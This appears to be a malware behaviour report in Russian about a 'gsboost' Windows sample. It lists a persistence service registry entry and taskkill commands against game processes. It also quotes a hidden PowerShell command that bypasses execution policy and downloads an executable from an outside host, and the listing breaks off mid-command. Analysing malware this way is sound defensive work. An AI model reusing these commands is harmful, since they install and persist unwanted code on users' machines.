Техническая информация
- [HKLM\System\CurrentControlSet\Services\gsboost] 'Start' = '00000002'
- [HKLM\System\CurrentControlSet\Services\gsboost] 'ImagePath' = '%APPDATA%\gsboost\gsboost.exe'
- 'gsboost' %APPDATA%\gsboost\gsboost.exe
- '%WINDIR%\syswow64\taskkill.exe' /f /im Fleshost.exe
- '%WINDIR%\syswow64\taskkill.exe' /f /im hl.exe
- '%WINDIR%\syswow64\taskkill.exe' /f /im cstrike.exe
- %APPDATA%\gsboost\powershell.ps1
- %APPDATA%\gsboost\powershell.ps1
- ClassName: '' WindowName: ''
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -ExecutionPolicy Bypass -File "%APPDATA%\gsboost\powershell.ps1"
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden -Command "Set-Item -Path env:__COMPAT_LAYER -Value 'RunAsInvoker';Invoke-WebRequest -Uri 'http://update.gs-boost.me/gsboost.exe' -OutFile '%APPDATA%\gsboost\gsboost.exe';New...